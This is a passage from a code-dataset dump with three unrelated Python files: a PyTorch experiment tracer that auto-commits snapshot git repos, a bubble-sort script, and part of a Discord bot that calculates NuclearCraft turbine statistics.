'tianyu'\n\nimport sys\nimport time\nimport shutil\nfrom pathlib import Path\nfrom contextlib import contextmanager\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom .utils.tracer_component import Config, Model\n\n\nclass Committer(object):\n    SNAPSHOT_GIT_NAME = \".snapshootgit\"\n    SNAPSHOT_GITIGNORE_NAME = \".snapignore\"\n\n    def __init__(self, code_dir: Path, work_name: str):\n        self._code_dir = code_dir\n        self._work_name = code_dir / work_name\n        self._snapshoot_git_path = self._code_dir / self.SNAPSHOT_GIT_NAME\n\n    def commit(self):\n        \"\"\"automatically commit code\"\"\"\n        self._check_snapshootgit()\n        try:\n            with self._git_switcher(self._code_dir):\n                ret = subprocess.call(\n                    \" && \".join([f\"cd {self._code_dir}\",\n                                 \"git add -A\",\n                                 \"git commit -a -m auto_commit\"]), shell=True)\n                return {\"ret\": ret, 'commit_id': self._get_commits(self._code_dir / '.git')[-1]}\n        except BaseException as e:\n            log(msg='Some error occurred while committing.', color='red')\n            raise e\n\n    def revert(self, commit_id):\n        \"\"\"copy the given version into the work experiment directory\n        :param commit_id: commit-id of the version to revert to\n        \"\"\"\n        flag = False\n        for id in self._get_commits(self._snapshoot_git_path):\n            if id.startswith(commit_id):\n                flag = True\n                commit_id = id\n                break\n        if not flag:\n            raise RuntimeError(\"snapshotted repo doesn't exist!\")\n\n        revert_path = self._work_name / 'revert' / commit_id[:7]\n        revert_path.mkdir(parents=True)\n\n        shutil.copytree(self._snapshoot_git_path, (revert_path / self.SNAPSHOT_GIT_NAME))\n        try:\n            with self._git_switcher(revert_path):\n                ret = subprocess.call(\n                    \" && \".join([f\"cd 
{revert_path}\", f\"git reset --hard {commit_id}\"]), shell=True\n                )\n                return ret\n        except BaseException as e:\n            log(msg='Some error occurred during the revert copy process!', color='red')\n            raise e\n\n    def _check_snapshootgit(self):\n        if not self._snapshoot_git_path.exists():\n            # create git repo for code capturing\n            user_gitignore = ''\n            if (self._code_dir / '.gitignore').exists():\n                user_gitignore = (self._code_dir / '.gitignore').open().read()\n\n            snap_ignore = self._code_dir / self.SNAPSHOT_GITIGNORE_NAME\n            snap_ignore.write_text(\"\"\"\n            {user_gitignore}\n            # exclude user's git repo\n            .git_backup/\n            .gitignore_backup\n            \n            .gitignore\n            \n            # experiment dirs\n            {work_name}/\n            \n            # some data files\n            *.tar*\n            *.mdb*\n            *.lmdb*\n            \"\"\".format(user_gitignore=user_gitignore, work_name=self._work_name), encoding='utf-8')\n\n            with self._git_switcher(self._code_dir):\n                # init snapshot repo\n                ret = subprocess.call(\"git init\", shell=True)\n                if ret != 0:\n                    raise RuntimeError('git may not be installed on your system')\n\n    @staticmethod\n    def _get_commits(path: Path):\n        \"\"\"Get all commit-ids of the snapshot git from the log under the project directory\n        \"\"\"\n        lines = (path / 'logs' / 'refs' / 'heads' / 'master').open('r').readlines()\n        commit_ids = []\n        for line in lines:\n            commit_ids.append(line.split()[1])\n\n        return commit_ids\n\n    @contextmanager\n    def _git_switcher(self, path: Path):\n        self._switch_to_snap_git(path)\n        yield\n        self._switch_to_standard_git(path)\n\n    def _switch_to_snap_git(self, path: Path):\n        \"\"\"Switch the working directory from normal git mode to snapshot-git mode\n        \"\"\"\n        checkout = [('.git', '.git_backup'), ('.gitignore', '.gitignore_backup'),\n                    (self.SNAPSHOT_GIT_NAME, '.git'), (self.SNAPSHOT_GITIGNORE_NAME, '.gitignore')]\n        for de in checkout:\n            if (path / de[0]).exists():\n                (path / de[0]).rename((path / de[1]))\n\n    def _switch_to_standard_git(self, path: Path):\n        \"\"\"Switch the working directory from snapshot-git mode back to normal git mode\n        \"\"\"\n        checkout = [('.git', '.git_backup'), ('.gitignore', '.gitignore_backup'),\n                    (self.SNAPSHOT_GIT_NAME, '.git'), (self.SNAPSHOT_GITIGNORE_NAME, '.gitignore')]\n        for de in checkout[::-1]:\n            if (path / de[1]).exists():\n                (path / de[1]).rename((path / de[0]))\n\n\nclass Tracer(object):\n    CONFIG_NAME = 'run_config'\n    ARCH_NAME = 'architecture'\n\n    def __init__(self, root_dir=Path('.'), work_name='network', clean_up=5):\n        self._committer = Committer(code_dir=root_dir, work_name=work_name)\n        self._snap_git_switch = True\n        self._tb_switch = True\n        self._debug_switch = False\n        self._dirs = {\n            'work_name': root_dir / work_name\n        }\n        self._clean_up_top = clean_up\n\n    def _start_log(self, logger_name):\n        # redirect stdout stderr to file\n        self._log = open(logger_name, 'w', encoding='utf-8')\n        self._stderr = sys.stderr\n        self._stdout = sys.stdout\n        sys.stderr = self._log\n        sys.stdout = self._log\n\n    def _clean_up(self):\n        # keep only the top-N best model checkpoints\n        files = self._dirs['checkpoint_best'].glob('{}*'.format(self._clean_up_prefix))\n        import re, os\n        files = sorted(files, key=lambda x: float(re.findall(r'Acc(.*?)_', str(x))[0]), reverse=True)\n        for file in files[self._clean_up_top:]:\n            os.remove(file)\n\n    def dirs(self, path_key):\n        assert self._dirs.__contains__(path_key), f\"{path_key} is wrong path_name.\"\n        return self._dirs.get(path_key)\n\n    def close(self):\n        if self._clean_up_top > 0:\n            self._clean_up()\n        # close I/O\n        if self._tb_switch: self._tb.close()\n        if not self._debug_switch:\n            self._log.close()\n            # restore stdout and stderr to the system defaults\n            sys.stderr = self._stderr\n            sys.stdout = self._stdout\n\n    @property\n    def tb(self):\n        # expose to 
caller\n        return self._tb\n\n    @staticmethod\n    def _get_now_time():\n        return time.strftime('%m%d_%H-%M-%S', time.localtime(time.time()))\n\n    def _build_dir(self):\n        for k, d in self._dirs.items():\n            if k == 'experiment_name': continue\n            if not d.exists(): d.mkdir(parents=True)\n\n    def snap_git_switch(self, status):\n        self._snap_git_switch = status\n        return self\n\n    def tb_switch(self, status):\n        self._tb_switch = status\n        return self\n\n    def debug_switch(self, status):\n        self._debug_switch = status\n        return self\n\n    def attach(self, experiment_name='exp', logger_name='log', override=True):\n        if not override:\n            experiment_name += f\"_{Tracer._get_now_time()}\"\n        self._dirs['experiment_name'] = experiment_name\n        if self._tb_switch:\n            self._dirs['tensorboard'] = self._dirs['work_name'] / 'tensorboard' / f\"{self._dirs['experiment_name']}\"\n        self._dirs['models'] = self._dirs['work_name'] / 'models' / self._dirs['experiment_name']\n        self._dirs['checkpoint_best'] = self._dirs['models'] / 'checkpoint' / 'best'\n        self._dirs['logs'] = self._dirs['work_name'] / 'logs' / self._dirs['experiment_name']\n\n        self._build_dir()\n\n        # edit tensorboard log_dir\n        if self._tb_switch:\n            self._tb = SummaryWriter(log_dir=self._dirs['tensorboard'])\n            print(f\"Start Tensorboard ... [tensorboard --port=6006 --logdir {self._dirs['tensorboard']}]\")\n\n        # new log file\n        logger_name = self._dirs['logs'] / logger_name\n        if logger_name.exists(): logger_name = f'{logger_name}_{self._get_now_time()}'\n\n        if not self._debug_switch: self._start_log(logger_name)\n\n        # automatically generate a readme for recording something\n        (self._dirs['models'] / 'readme.txt').open('w+', encoding='utf-8')\n\n        # expose dirs\n        return self\n\n    def store(self, component):\n        if isinstance(component, Config):\n            if self._snap_git_switch:\n                # add snap commit id\n                log(msg=\"==== auto commit ====\", color='blue')\n                try:\n                    state = self._committer.commit()\n                    if state['ret'] == 0:\n                        component.add_item('snap_commit_id', state['commit_id'])\n                        log(msg=f\"commit id: {state['commit_id']}\")\n                    else:\n                        log(msg=f\"some errors in the process of committing!\", color='red')\n                except Exception as e:\n                    log(msg='auto commit failed!', color='red')\n                    log(msg='+++ Trace +++')\n                    log(msg=str(e))\n\n            component.save(self._dirs['models'] / f'{Tracer.CONFIG_NAME}.json')\n        if isinstance(component, Model):\n            self._clean_up_prefix = component.name.replace('.pth.tar', '')\n            component.save(self._dirs['checkpoint_best'].parent, self._dirs['models'] / f'{Tracer.ARCH_NAME}.txt')\n\n    def load(self, component):\n        if isinstance(component, Model):\n            return component.load(self._dirs['work_name'] / 'models')\n\n    def revert(self, commit_id):\n        self._committer.revert(commit_id)\n","repo_name":"tianyu-su/torchfurnace","sub_path":"torchfurnace/tracer.py","file_name":"tracer.py","file_ext":"py","file_size_in_byte":9986,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"1194698068","text":"#Imports\r\nimport sys\r\n\r\n#bubbleSort algorithm\r\ndef bubbleSort(list1):\r\n    n = len(list1)\r\n\r\n    for i in range(n):\r\n\r\n        for j in range(0, n-i-1):\r\n            if list1[j] > list1[j+1]:\r\n\r\n                list1[j], list1[j+1] = list1[j+1], list1[j]\r\n\r\n#takes user input and converts the list to an int list\r\nnumbers = input('Input the numbers you would like to sort (Separated by a space):')\r\n\r\nnumberList = numbers.split(\" \")\r\n\r\nfor i in range(len(numberList)):\r\n    numberList[i] = int(numberList[i])\r\n\r\n#Runs algorithm and prints the 
output\r\nbubbleSort(numberList)\r\n\r\nprint('The sorted list is: ' + str(numberList))\r\n\r\nsys.exit()","repo_name":"thewhitelisted/bubblesorts","sub_path":"numberSorter.py","file_name":"numberSorter.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38939164062","text":"import discord\nfrom discord.ext import commands\nfrom math import pow, sqrt, ceil, sin, pi\nfrom math import log as ln\nimport asyncio\nimport re\n\ntoken = [REDACTED]\nenabled_channel = [REDACTED]\n\n\nbladeStats = {\"trinitite\": [0.6, 0.0, True], \"thorium\": [0.65, 0.0, True], \"du\": [0.7, 0.0, True],\n \"stator\": [0.75, 0.0, True], \"e60\": [0.8, 0.0, True], \"une-90\": [0.85, 1.0, False],\n \"une-192\": [0.9, 1.1, False], \"une-231\": [0.95, 1.2, False], \"edelstahl\": [1.25, 1.5, False],\n \"niosteel\": [1.35, 1.0, False], \"steel\": [1.4, 1.0, False], \"neptunium\": [1.45, 1.03, False],\n \"plutonium\": [1.50, 1.06, False], \"legierung\": [1.50, 1.5, False], \"extnio\": [1.55, 1.1, False],\n \"extreme\": [1.6, 1.1, False], \"americium\": [1.65, 1.13, False], \"curium\": [1.7, 1.16, False],\n \"sicnio\": [1.75, 1.2, False], \"matrix\": [1.75, 1.5, False], \"sic\": [1.8, 1.2, False],\n \"berkelium\": [1.9, 1.23, False], \"steelcake\": [2.0, 1.0, False], \"californium\": [2.2, 1.27, False],\n \"hccake\": [3.0, 1.08, False], \"extremecake\": [4.0, 1.06, False], \"tccake\": [5.0, 1.08, False],\n \"febcake\": [6.0, 1.08, False], \"toughcake\": [8.0, 1.16, False], \"siccake\": [16.0, 1.20, False]}\n\nbladeAliases = {\"trinitite\": [\"trinitite\", \"tri\", 752973193878175825],\n \"thorium\": [\"thorium\", \"th\", \"ths\", 752973193710665809],\n \"du\": [\"du\", \"dus\", 752973193740026008],\n \"stator\": [\"stator\", \"sta\", \"st\", 752974289866719253],\n \"e60\": [\"e60\", \"e-60\", \"elektron60\", 752973194033365042],\n \"une-90\": [\"une-90\", \"unwieldy-90\", \"une90\", 752973096742289428],\n \"une-192\": [\"une-192\", \"unwieldy-192\", \"une192\", 752973096922644520],\n \"une-231\": [\"une-231\", \"unwieldy-231\", \"une231\", 752973096700608615],\n \"edelstahl\": [\"edelstahl\", \"ultralight-edelstahl\", \"ul-edel\", \"ultralightedelstahl\", \"ule\", 752973096738226316],\n \"niosteel\": [\"niosteel\", \"niobium-steel\", \"nios\", 752973097044279437],\n \"steel\": [\"steel\", \"ste\", \"s\", 752974289766187068],\n \"neptunium\": [\"neptunium\", \"np\", 752973096884895866],\n \"plutonium\": [\"plutonium\", \"pu\", 752973097170239498],\n \"legierung\": [\"legierung\", \"ultralight-legierung\", \"ul-legie\", \"ultralightlegierung\", \"ull\", 752973096641888348],\n \"extnio\": [\"extnio\", \"extremenio\", \"extreme-nio\", \"enio\", 752973097040347167],\n \"extreme\": [\"extreme\", \"ext\", \"ex\", 752974289719918663],\n \"americium\": [\"americium\", \"am\", 752973096561934437],\n \"curium\": [\"curium\", \"cm\", 752973096608071770],\n \"sicnio\": [\"sicnio\", \"sicniosic\", 752973097300131890],\n \"matrix\": [\"matrix\", \"ultralight-matrix\", \"ul-matrix\", \"ultralightmatrix\", \"ulm\", 752973096771780721],\n \"sic\": [\"sic\", \"sicsiccmc\", \"sicsic\", 752974289569054752],\n \"berkelium\": [\"berkelium\", \"bk\", 752973096553676931],\n \"steelcake\": [\"steelcake\", \"scake\", 761850409538551819],\n \"californium\": [\"californium\", \"cf\", 752973096566128790],\n \"hccake\": [\"hccake\", \"hardcarboncake\", 761850409110732811],\n \"extremecake\": [\"extremecake\", \"extcake\", 761850409835954196],\n 
\"tccake\": [\"tccake\", \"thermoconductingcake\", 761850409366978571],\n \"febcake\": [\"febcake\", \"ferroboroncake\", 761850277619302401],\n \"toughcake\": [\"toughcake\", \"tcake\", 761850277514575882],\n \"siccake\": [\"siccake\", \"sicsiccake\", 761850409370517515]}\n\nbladeConversions = {\"trinitite\": \"0\", \"thorium\": \"1\", \"du\": \"2\", \"stator\": \"3\", \"e60\": \"4\", \"une-90\": \"5\",\n \"une-192\": \"6\", \"une-231\": \"7\", \"edelstahl\": \"8\", \"niosteel\": \"9\", \"steel\": \"a\", \"neptunium\": \"b\",\n \"plutonium\": \"c\", \"legierung\": \"d\", \"extnio\": \"e\", \"extreme\": \"f\", \"americium\": \"g\", \"curium\": \"h\",\n \"sicnio\": \"i\", \"matrix\": \"j\", \"sic\": \"k\", \"berkelium\": \"l\", \"steelcake\": \"m\", \"californium\": \"n\",\n \"hccake\": \"o\", \"extremecake\": \"p\", \"tccake\": \"q\", \"febcake\": \"r\", \"toughcake\": \"s\", \"siccake\": \"t\"}\n\ngasStats = {\"hps\": [16.0, 4.0], \"lps\": [4.0, 2.0], \"steam\": [4.0, 2.0], \"scs\": [16.0, 16.0], \"scco2\": [24.0, 8.0],\n \"n2\": [11.0, 2.0], \"co2\": [17.0, 3.0], \"he\": [30.0, 4.0], \"ar\": [12.0, 2.0], \"ne\": [51.0, 8.0],\n \"kr\": [24.3, 5.0], \"xe\": [22.0, 6.0]}\n\ngasAliases = {\"hps\": [\"hps\", \"High Pressure Steam\", \"highpressuresteam\", \"hpsteam\"],\n \"lps\": [\"lps\", \"Low Pressure Steam\", \"lowpressuresteam\", \"lpsteam\"],\n \"steam\": [\"steam\", \"Steam\", \"meksteam\", \"tes\", \"forgesteam\", \"testeam\"],\n \"scs\": [\"scs\", \"Supercritical Steam\", \"supercriticalsteam\", \"scsteam\"],\n \"scco2\": [\"scco2\", \"Supercritical Carbon Dioxide\", \"supercriticalco2\",\n \"supercriticalcarbondioxide\", \"sco2\", \"scarbondioxide\", \"sccarbondioxide\"],\n \"n2\": [\"n2\", \"Hot Nitrogen\", \"nitrogen\", \"hotnitrogen\", \"hotn2\"],\n \"co2\": [\"co2\", \"Hot Carbon Dioxide\", \"carbondioxide\", \"hotco2\", \"hotcarbondioxide\"],\n \"he\": [\"he\", \"Hot Helium\", \"helium\", \"hothelium\", \"hothe\"],\n \"ar\": [\"ar\", \"Hot Argon\", \"argon\", \"hotargon\", \"hotar\"],\n \"ne\": [\"ne\", \"Hot Neon\", \"neon\", \"hotneon\", \"hotne\"],\n \"kr\": [\"kr\", \"Hot Krypton\", \"krypton\", \"hotkrypton\", \"hotkr\"],\n \"xe\": [\"xe\", \"Hot Xenon\", \"xenon\", \"hotxenon\", \"hotxe\"]}\n\noverhaulAliases = [\"overhaul\", \"oh\", \"nco\", \"over\"]\npreoverhaulAliases = [\"pre-overhaul\", \"po\", \"underhaul\", \"preoverhaul\", \"uh\", \"nc\"]\n\nclient = commands.Bot(command_prefix=\"&\")\nclient.remove_command(\"help\")\n\n\n# controls embed menus\nasync def embedSetup(ctx, embeds: list):\n page = 0\n botMessage = await ctx.send(embed=embeds[page])\n if len(embeds) > 1:\n await botMessage.add_reaction(\"\\U0000274C\")\n await botMessage.add_reaction(\"\\U000025C0\")\n await botMessage.add_reaction(\"\\U000025B6\")\n\n def check(r, u):\n return u == ctx.message.author and str(r.emoji) in (\"\\U000025B6\", \"\\U000025C0\", \"\\U0000274C\")\n\n while True:\n try:\n react, user = await client.wait_for(\"reaction_add\", timeout=60.0, check=check)\n except asyncio.TimeoutError:\n await botMessage.clear_reactions()\n break\n else:\n if str(react.emoji) == \"\\U000025B6\":\n page += 1\n if page == len(embeds):\n page = 0\n await botMessage.edit(embed=embeds[page])\n await botMessage.remove_reaction(emoji=\"\\U000025B6\", member=user)\n elif str(react.emoji) == \"\\U000025C0\":\n page -= 1\n if page == -1:\n page = len(embeds) - 1\n await botMessage.edit(embed=embeds[page])\n await botMessage.remove_reaction(emoji=\"\\U000025C0\", member=user)\n elif str(react.emoji) == 
\"\\U0000274C\":\n await botMessage.clear_reactions()\n break\n\n\n# calculate stats\ndef calcStats(mode, gasName, gasRFMB, gasExp, blades, dims, gasInput, coilEff):\n def idealMult(ideal, actual):\n return min(ideal, actual)/max(ideal, actual)\n\n actualExp, idealExp, embedsList = [], [], []\n totalExp, bladeMult, minStatorExp, maxStatorExp, minBladeExp = 1.0, 0.0, 1.0, 2.0**(-1000), 2.0**1000\n maxBladeExp, throughputBonus = 1.0, 1.0\n statorCount, minInput = 0, 0\n rotorsDict = {alias: 0 for alias in list(bladeAliases)}\n bladeString, statsString, blocksString, rotorsString, footerText, footer2Text = \"\", \"\", \"\", \"\", \"\", \"\"\n turbineString = \"/{0}/{1}/{2}/{3}\".format(mode, gasName, gasRFMB, gasExp)\n if dims is not None:\n turbineString += \"/{0}/{1}/\".format(dims[0], dims[1])\n if gasName != \"Custom\":\n gasName = gasAliases[gasName][1]\n\n for i in range(len(blades)):\n currentBlade = bladeStats[blades[i]]\n prevExp = totalExp\n idealExp.append(pow(gasExp, (i + 0.5)/len(blades)))\n totalExp *= currentBlade[0]\n bladeString += \"{} \".format(client.get_emoji(bladeAliases[blades[i]][-1]))\n rotorsDict[blades[i]] += 1\n if currentBlade[2]:\n statorCount += 1\n if mode in preoverhaulAliases:\n actualExp.append((prevExp + totalExp)/2)\n if blades[i] == \"sic\":\n bladeMult += 0.05*idealMult(idealExp[i], actualExp[i])\n elif mode in overhaulAliases:\n actualExp.append(prevExp*sqrt(currentBlade[0]))\n if currentBlade[2]:\n minStatorExp = min(minStatorExp, currentBlade[0])\n maxStatorExp = max(maxStatorExp, currentBlade[0])\n else:\n minBladeExp = min(minBladeExp, currentBlade[0])\n maxBladeExp = max(maxBladeExp, currentBlade[0])\n\n bladeMult += currentBlade[1]*idealMult(idealExp[i], actualExp[i])\n if dims is not None:\n turbineString += \"{0}\".format(bladeConversions[blades[i]])\n turbineString += \"/\"\n\n try:\n bladeMult /= len(blades) - statorCount\n except ZeroDivisionError:\n bladeMult = 0.0\n\n energyDensity = gasRFMB*bladeMult*idealMult(gasExp, totalExp)\n\n if dims is not None: # dims is the tuple (turbineDim, bearingDim) or None if dims aren't input!\n shaftLen = len(blades)\n bearings = 2*dims[1]**2\n frames = 8*(dims[0] + 1) + 4*shaftLen\n casings = 2*(dims[0] ** 2) + 4*(dims[0]*shaftLen) - 2*bearings - 3 # assumes coils = bearings, 1 inlet & 1 outlet\n coils = min(bearings, 2*dims[0]**2 - bearings - 2)\n if bearings > dims[0]**2: # if bearings are more than half the in/out surface area, all casings are covered by coils\n casings = 4*(dims[0]*shaftLen) - 1\n shafts = (bearings*shaftLen) // 2\n bladeArea = 2*dims[1]*(dims[0]-dims[1])\n maxInput = bladeArea*(shaftLen - statorCount)*100\n\n if gasInput is None:\n gasInput = maxInput\n\n if mode in overhaulAliases:\n # low throughput penalty\n if gasExp <= 1.0 or maxBladeExp <= 1.0:\n effMinLen = 24.0\n else:\n effMinLen = ceil(ln(gasExp)/ln(maxBladeExp))\n absLeniency = 400*effMinLen\n minInput = int(max(0, 0.75*maxInput - absLeniency))\n\n if maxInput == 0:\n throughputRatio = 1.0\n else:\n throughputRatio = min(1.0, (absLeniency + gasInput)/maxInput)\n\n if throughputRatio >= 0.75:\n throughputPenalty = 1.0\n else:\n throughputPenalty = 0.5*sin(throughputRatio*pi/1.5) + 0.5\n\n # high throughput bonus\n if minBladeExp <= 1.0 or minStatorExp >= 1.0:\n effMaxLen = 24\n else:\n effMaxLen = max(1, min(24, ceil(ln(gasExp) - 24*(ln(minStatorExp)/ln(minBladeExp/minStatorExp)))))\n\n lengthBonus = gasInput/(100.0 * effMaxLen * bladeArea)\n areaBonus = sqrt(gasInput/(1200.0 * shaftLen * effMaxLen))\n throughputBonus = 1 + 
pow(lengthBonus*areaBonus, 2.0/3.0)\n\n energyDensity *= throughputPenalty*throughputBonus\n\n if coilEff is not None:\n energyDensity *= coilEff\n\n powerOutput = int(energyDensity*gasInput)\n\n # create field strings\n # field 1.2: turbine stats (field 1.1, gas stats is created on embed creation later)\n if mode in overhaulAliases:\n gasInput = int(min(gasInput, 2*maxInput))\n statsString = \"Dimensions: {0}x{0}x{1} ({2}x{2} Bearing)\\n\" \\\n \"Power Output\\*: {3:,} RF/t\\n\" \\\n \"Total Expansion: {4:.2%} [{5:g} x {6:.2%}]\\n\" \\\n \"Rotor Efficiency: {9:.2%}\\n\" \\\n \"Throughput Bonus: {7:.2%}\\n\" \\\n \"Energy Density\\*: {8:.2f} RF/mB\\n\".format(dims[0], shaftLen, dims[1], powerOutput, totalExp,\n gasExp, totalExp/gasExp, throughputBonus,\n energyDensity, bladeMult)\n if gasInput:\n statsString += \"Input Rate: {0:,}/{1:,} mB/t [{2:.0%}]\\n\" \\\n \"Min Input\\*\\*: {3:,} mB/t\\n\".format(gasInput, maxInput, gasInput/maxInput, minInput)\n footerText = \"*Dynamo efficiency not included.\\n**Minimum mB/t of gas needed for no penalty.\\n\"\n if coilEff:\n statsString += \"Dynamo Efficiency: {0:.2%}\\n\".format(coilEff)\n footerText = \"*Dynamo efficiency included.\\n**Minimum mB/t of gas needed for no penalty.\\n\"\n elif mode in preoverhaulAliases:\n gasInput = int(min(gasInput, maxInput))\n statsString = \"Dimensions: {0}x{0}x{1} ({2}x{2} Bearing)\\n\" \\\n \"Power Output\\*: {3:,} RF/t\\n\" \\\n \"Total Expansion: {4:.2%} [{5:g} x {6:.2%}]\\n\" \\\n \"Rotor Efficiency: {8:.2%}\\n\" \\\n \"Energy Density\\*: {7:.2f} RF/mB\\n\".format(dims[0], shaftLen, dims[1], powerOutput, totalExp,\n gasExp, totalExp / gasExp, energyDensity, bladeMult)\n statsString += \"Input Rate: {0:,}/{1:,} mB/t [{2:.0%}]\\n\".format(gasInput, maxInput, gasInput/maxInput)\n if coilEff is None:\n footerText = \"*Dynamo efficiency not included.\\n\"\n else:\n statsString += \"Dynamo Efficiency: {0:.2%}\\n\".format(coilEff)\n footerText = \"*Dynamo efficiency included.\\n\"\n\n # field 2.1: blocks required string\n if mode in overhaulAliases:\n blocksString = \"Casings (total): {4} ({0})*\\nCasings (as frame): {1}\\nBearings: {2}\\nShafts: {3}\\nCoils: {5}\\n\" \\\n \"Inlets: 1\\nOutlets: 1\\nController: 1\\n\".format(casings, frames, bearings, shafts,\n casings + frames, coils)\n footer2Text = \"*Turbine glass needed for transparent turbine.\\n\"\n elif mode in preoverhaulAliases:\n blocksString = \"Casings: {0}\\nFrames: {1}\\nBearings: {2}\\nShafts: {3}\\nCoils: {4}\\n\" \\\n \"Inlets: 1\\nOutlets: 1\\nController: 1\\n\".format(casings, frames, bearings, shafts, coils)\n\n # field 2.2: rotor blade string\n rotorsString += \"Total Blades: {:,}\\n\".format(bladeArea * shaftLen)\n for rotorName, rotorCount in rotorsDict.items():\n if rotorCount == 0:\n continue\n else:\n rotorsString += \"{0} x{1:,}\\n\".format(client.get_emoji(bladeAliases[rotorName][-1]), rotorCount*bladeArea)\n\n # alternative field 1.2 when dimensions are not input\n else:\n statsString = \"Shaft Length: {0}\\nTotal Expansion: {1:.2%} [{2:g} x {3:.2%}]\\n\" \\\n \"Rotor Efficiency: {4:.2%}\\nEnergy Density\\*: {5:.2f} RF/mB\".format(len(blades), totalExp,\n gasExp, totalExp/gasExp,\n bladeMult, energyDensity)\n footerText = \"*Any coil and gas input modifiers not included.\\n\"\n\n # produce embeds\n statsPage1 = discord.Embed(title=\"{} Turbine (Stats)\".format(mode.capitalize()), colour=0x123456, description=\n \"An overview of the given turbine's stats.\")\n statsPage1.add_field(name=\"Blade Configuration\", value=bladeString, 
inline=False)\n statsPage1.add_field(name=\"Gas Stats\", value=\"Name: {0}\\nBase Energy: {1:g} RF/mB\\nIdeal Expansion: {2:.0%}\\n\"\n .format(gasName, gasRFMB, gasExp), inline=False)\n statsPage1.add_field(name=\"Turbine Stats\", value=statsString, inline=False)\n statsPage1.set_footer(text=\"{}Turbine Calculator Bot by FishingPole#3673\".format(footerText))\n embedsList = [statsPage1]\n if dims is not None:\n statsPage1.add_field(name=\"Turbine String (Copy & paste in &stats command)\", value=turbineString, inline=False)\n statsPage2 = discord.Embed(title=\"{} Turbine (Blocks)\".format(mode.capitalize()), colour=0x123456, description=\n \"An overview of the blocks required to build the turbine.\")\n statsPage2.add_field(name=\"Blocks Required\", value=blocksString, inline=False)\n statsPage2.add_field(name=\"Blades Required\", value=rotorsString, inline=False)\n statsPage2.set_footer(text=\"{}Turbine Calculator Bot by FishingPole#3673\".format(footer2Text))\n embedsList.append(statsPage2)\n\n return embedsList\n\n\n@client.event\nasync def on_ready():\n print('Bot online as {0.user}'.format(client))\n\n\n@client.command()\nasync def ping(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"Pong! `{:.0f} ms`\".format(client.latency*1000))\n\n\n@client.command()\nasync def smore(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"S'more! {}\".format(str(client.get_emoji(493612965195677706))))\n\n\n@client.command()\nasync def praise(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"{}\".format(str(client.get_emoji(588415212223201327))))\n\n\n@client.command(aliases=[\"ban\", \"banhammer\"])\nasync def banned(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"{}\".format(str(client.get_emoji(717806537967534232))))\n\n\n@client.command(aliases=[\"fishingpole\", \"FishingPole\", \"thepolethatfishes\", \"ThePoleThatFishes\"])\nasync def pole(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"{}\".format(str(client.get_emoji(711260788215644230))))\n\n\n@client.command()\nasync def help(ctx):\n footer = \"Turbine Calculator Bot by FishingPole#3673\"\n imageURL = \"https://cdn.discordapp.com/attachments/754459106709995600/766026990129119242/bottutorial.png\"\n helpPage1 = discord.Embed(title=\"Help menu (Page 1)\", colour=0x123456, description=\"A list of available commands!\")\n helpPage1.add_field(name=\"&calc/&turbine/&plan\", value=\"Calculate a turbine given some parameters. Syntax:\\n\"\n \"`&calc [mode] [fuel] (dimensions) [blades]` or \\n\"\n \"`&calc [mode] [base RF/mB] [ideal expansion] (dimensions) [blades]`\\n\"\n \"See page 2 for more details!\")\n helpPage1.add_field(name=\"&stats\", value=\"Calculate a turbine's stats using specific input rate and dynamo efficiency. Syntax:\\n\"\n \"`&stats [turbine string] [input rate] (dynamo efficiency)`\\n\"\n \"See page 4 for more details!\", inline=False)\n helpPage1.add_field(name=\"&help\", value=\"Prints this message.\", inline=False)\n helpPage1.add_field(name=\"&ping\", value=\"The infamous ping command. Returns ping (in ms) of the bot.\", inline=False)\n helpPage1.add_field(name=\"Easter eggs!\", value=\"The bot also contains a couple easter egg commands! 
Can you find them?\", inline=False)\n helpPage1.add_field(name=\"Navigation\", value=\"You can navigate the embeds by adding to the reactions of the bot.\\n\"\n \"▶ goes to the next page,\\n◀ goes to the previous page,\\n❌ exits the navigation menu.\")\n helpPage1.set_footer(text=footer)\n helpPage2 = discord.Embed(title=\"Help menu (Page 2)\", colour=0x123456,\n description=\"[Full List of Aliases]({})\".format(\n \"https://github.com/ThePoleThatFishes/Turbine-Bot/blob/master/aliases.txt\"\n ))\n helpPage2.add_field(name=\"&calc Details\", value=\"`mode`: The calculation mode. Refers to overhaul or pre-overhaul\"\n \" NC.\\nCheck list of aliases at the top for valid names.\\n`fuel`: The type of gas that\"\n \" enters the turbine. Usually a type of steam.\\nValid names can be found in the list of aliases.\\n`base RF/mB`: \"\n \"The base energy density of the gas (Can be decimal).\\n**__Not compatible with fuel\"\n \" type!__**\\n`ideal expansion`: The ideal expansion of the gas. \\nWritten as a number or a percentage. (eg. 4 and 400% are both ok)\\n**__Not compatible\"\n \" with fuel type!__**\\n`dimensions`: Turbine & Bearing dimensions. Written as `txby`, x is turbine diameter\\n\"\n \"and y is bearing diameter. **__Optional Parameter__**\\n\"\n \"`blades`: The blades used in the turbine. Each blade is separated by a space.\\nValid names can be found in the list\"\n \" of aliases. (top of the embed)\", inline=False)\n helpPage2.add_field(name=\"Examples of a &calc command\",\n value=\"`&calc nco hps steel ext s`\\nA turbine in NC Overhaul, with\"\n \" unspecified dimensions, that uses high pressure steam, and blades used are steel extreme steel.\\n `&calc nc lps t8b4 s s`\\n\"\n \"A 8x8x2 pre-overhaul turbine that has a 4x4 bearing, uses low pressure steam and blades used are steel steel.\\n A visual example of a command: (click image)\",\n inline=False)\n helpPage2.set_image(url=imageURL)\n helpPage3 = discord.Embed(title=\"Help menu (Page 3)\", colour=0x123456, description=\"A list of common aliases you can use!\")\n helpPage3.add_field(name=\"NC Version\", value=\"NC Overhaul: `nco`, `overhaul`\\n\"\n \"NC Preoverhaul: `nc`, `pre-overhaul`, `underhaul`\", inline=False)\n helpPage3.add_field(name=\"Steam Type\", value=\"High Pressure Steam: `hps`, `hpsteam`\\n\"\n \"Low Pressure Steam: `lps`, `lpsteam`\\n\"\n \"Steam (from other mods): `steam`, `meksteam`, `testeam`\", inline=False)\n helpPage3.add_field(name=\"Blades\", value=\"Stator: `st`, `sta`, `:stator:`\\n\"\n 